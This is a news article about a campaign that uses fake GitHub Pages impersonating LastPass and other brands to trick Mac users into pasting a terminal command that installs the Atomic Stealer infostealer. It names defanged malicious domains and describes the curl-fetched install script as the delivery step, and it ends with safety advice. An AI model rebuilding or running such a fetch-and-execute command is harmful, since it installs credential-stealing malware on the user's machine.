• Business

    Are you an Apple Mac user? Cybercriminals are using this popular website to target you with malware and infostealers – here’s what you need to stay safe

    AnyFans Posted on

    By Efosa Udinmwen

    Copyright techradar

    Are you an Apple Mac user? Cybercriminals are using this popular website to target you with malware and infostealers - here's what you need to stay safe

    Skip to main content

    Tech Radar Pro

    Tech Radar Gaming

    Close main menu

    the business technology experts

    België (Nederlands)

    Deutschland

    North America

    US (English)

    Australasia

    New Zealand

    View Profile

    Search TechRadar

    Expert Insights

    Website builders

    Web hosting

    Best web hosting
    Best office chairs
    Best website builder
    Best antivirus
    Expert Insights

    Don’t miss these

    GitHub users targeted with dangerous malware attacks – here’s what we know

    Criminals are using a dangerous fake free VPN to spread malware via GitHub – here’s how to stay safe

    One of the biggest security threats to Apple systems just got a major upgrade – here’s what we know

    Chinese malware is flooding GitHub pages – HiddenGh0st, Winos and kkRAT hit devs via SEO poisoning

    Be careful where you click in Google search results – it could be damaging malware

    Major new malware strain targets crypto users via malicious ads – here’s what we know, and how to stay safe

    Endgame Gear warns mouse config tool has been infected with malware

    Microsoft warns dangerous PipeMagic backdoor is being disguised as ChatGPT desktop app – here’s what we know

    GitHub supply chain attack sees thousands of tokens and secrets stolen in GhostAction campaign

    A terrifying, self-replicating malwaere has infected npm packages with over 2 million downloads per week – here’s how to stay safe

    More popular npm packages hijacked to spread malware

    Dangerous new Linux malware strikes – thousands of users see passwords, personal info stolen, here’s what we know

    Apple users beware – hackers crack iCloud Calendar invites to sneak malware onto your system, here’s how to stay safe

    Are they brave or stupid? Malware targeting Russian crypto hackers found

    Hackers are distributing a fake PDF Editor loaded with TamperedChef credential stealing malware

    Are you an Apple Mac user? Cybercriminals are using this popular website to target you with malware and infostealers – here’s what you need to stay safe

    Efosa Udinmwen

    24 September 2025

    SEO tricks push fraudulent pages to the top of search results

    When you purchase through links on our site, we may earn an affiliate commission. Here’s how it works.

    (Image credit: Shutterstock)

    Atomic Stealer malware installs silently via fake GitHub Pages targeting Mac users
    Attackers create multiple GitHub accounts to bypass platform takedowns repeatedly
    Users copying commands from unverified websites risk serious system compromise

    Cybersecurity researchers are warning Apple Mac users about a campaign using fraudulent GitHub repositories to spread malware and infostealers.

    Research from LastPass Threat Intelligence, Mitigation, and Escalation (TIME) analysts found attackers are impersonating well-known companies to convince people to download fake Mac software.
    Two fraudulent GitHub pages pretending to offer LastPass for Mac were first spotted on September 16 2025 under the username “modhopmduck476.”

    You may like

    GitHub users targeted with dangerous malware attacks – here’s what we know

    Criminals are using a dangerous fake free VPN to spread malware via GitHub – here’s how to stay safe

    One of the biggest security threats to Apple systems just got a major upgrade – here’s what we know

    How the attack chain works
    While these particular pages have been taken down, the incident suggests a broader pattern that continues to evolve.

    The fake GitHub pages included links labeled “Install LastPass on MacBook,” which redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass.
    From there, users were sent to macprograms-pro[.]com/mac-git-2-download.html and told to paste a command into their Mac’s terminal.
    That command used a CURL request to fetch a base64-encoded URL that decoded to bonoud[.]com/get3/install.sh.

    Are you a pro? Subscribe to our newsletter
    Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
    Contact me with news and offers from other Future brandsReceive email from us on behalf of our trusted partners or sponsorsBy submitting your information you agree to the Terms & Conditions and Privacy Policy and are aged 16 or over.
    The script then delivered an “Update” payload that installed Atomic Stealer (AMOS malware) into the Temp directory.
    Atomic Stealer, which has been active since April 2023, is a known infostealer used by financially motivated cybercrime groups.
    Investigators have linked this campaign to many other fake repositories impersonating companies ranging from financial institutions to productivity apps.

    You may like

    GitHub users targeted with dangerous malware attacks – here’s what we know

    Criminals are using a dangerous fake free VPN to spread malware via GitHub – here’s how to stay safe

    One of the biggest security threats to Apple systems just got a major upgrade – here’s what we know

    The list of targeted names includes 1Password, Robinhood, Citibank, Docker, Shopify, Basecamp, and numerous others.
    Attackers appear to create multiple GitHub usernames to bypass takedowns, using Search Engine Optimization to push their malicious links higher on search results in Google and Bing.
    This technique increases the chances that Mac users searching for legitimate downloads will encounter the fraudulent pages first.
    LastPass states it is “actively monitoring this campaign” while working on takedowns and sharing indicators of compromise to help others detect threats.
    The attackers’ use of GitHub Pages reveals both the convenience and the risks of community platforms.
    Fraudulent repositories can be set up quickly, and while GitHub can remove them, attackers often return under new aliases.
    This cycle raises questions about how effectively such platforms can protect users.
    How to stay safe

    Only download software from verified sources to avoid malware and ransomware risks.
    Avoid copying commands from unfamiliar websites to prevent unauthorized code execution.
    Keep macOS and all installed software up to date to reduce vulnerabilities.
    Use the best antivirus or security software that includes ransomware protection to block threats.
    Enable regular system backups to recover files if ransomware or malware strikes.
    Stay skeptical of unexpected links, emails, and pop-ups to minimize exposure.
    Monitor official advisories from trusted vendors for timely security updates and guidance.
    Configure strong, unique passwords and enable two-factor authentication for important accounts.
    You might also like

    These are the best firewall offerings around today
    Common internet scams and how to avoid them
    Backers may have lost a total of more than $170,000 backing an 8-SSD subwoofer-like NAS mini PC

    Efosa Udinmwen

    Freelance Journalist

    Efosa has been writing about technology for over 7 years, initially driven by curiosity but now fueled by a strong passion for the field. He holds both a Master’s and a PhD in sciences, which provided him with a solid foundation in analytical thinking. Efosa developed a keen interest in technology policy, specifically exploring the intersection of privacy, security, and politics. His research delves into how technological advancements influence regulatory frameworks and societal norms, particularly concerning data protection and cybersecurity. Upon joining TechRadar Pro, in addition to privacy and technology policy, he is also focused on B2B security products. Efosa can be contacted at this email: udinmwenefosa@gmail.com

    You must confirm your public display name before commenting

    Please logout and then login again, you will then be prompted to enter your display name.

    GitHub users targeted with dangerous malware attacks – here’s what we know

    Criminals are using a dangerous fake free VPN to spread malware via GitHub – here’s how to stay safe

    One of the biggest security threats to Apple systems just got a major upgrade – here’s what we know

    Chinese malware is flooding GitHub pages – HiddenGh0st, Winos and kkRAT hit devs via SEO poisoning

    Be careful where you click in Google search results – it could be damaging malware

    Major new malware strain targets crypto users via malicious ads – here’s what we know, and how to stay safe

    Latest in Security

    Libraseva urges users to patch now as it issues emergency fix following attacks

    GitHub is finally tightening up security around npm following multiple attacks

    Watch out – even small businesses are now facing threats from deepfake attacks

    Casino gaming giant hit by major cyberattack – employee information and more stolen, here’s what we know

    “It could be catastrophic to the city” – US Secret Service takes down massive million-dollar network of SIM cards it says was capable of taking down comms across New York

    US federal agency breached by hackers using GeoServer exploit, CISA says

    Latest in News

    Qualcomm’s new Snapdragon 8 Elite Gen 5 will power the next Galaxy and phones that will hear and see everything

    ‘I’ve seen it, it’s incredible’: Qualcomm CEO hypes new desktop Android OS that sounds like a genuine game-changer

    Hisense’s new UST laser projector promises premium home theater up to 150 inches, for a very tempting price

    Logitech’s new solar-powered keyboard can last 4 months in complete darkness on a single charge – and works with artificial light too

    New Stranger Things season 5 trailer teases one last quest for the Hawkins crew – and lots of unseen footage for the hit Netflix show’s final hurrah

    Proton VPN’s no-logs policy holds up under scrutiny of fourth independent audit

    LATEST ARTICLES

    Are you an Apple Mac user? Cybercriminals are using this popular website to target you with malware and infostealers – here’s what you need to stay safe

    Qualcomm’s new Snapdragon 8 Elite Gen 5 will power the next Galaxy and phones that will hear and see everything

    “Making a great chip means nothing if we can’t do it the next year” – Qualcomm unveils powerful new Snapdragon X2 Elite chips for faster, better laptops

    Terramaster uses the fastest Intel Celeron CPU ever in its new up-to-120TB 4-bay NAS – and I am curious about the new TRAID feature

    Google says adblockers caused YouTube views count to drop – this is what adblockers told us really happened

    TechRadar is part of Future US Inc, an international media group and leading digital publisher. Visit our corporate site.

    Contact Future’s experts

    Terms and conditions

    Privacy policy

    Cookies policy

    Advertise with us

    Web notifications

    Accessibility Statement

    Future US, Inc. Full 7th Floor, 130 West 42nd Street,

    Please login or signup to comment

    Please wait…

    You Might Also Like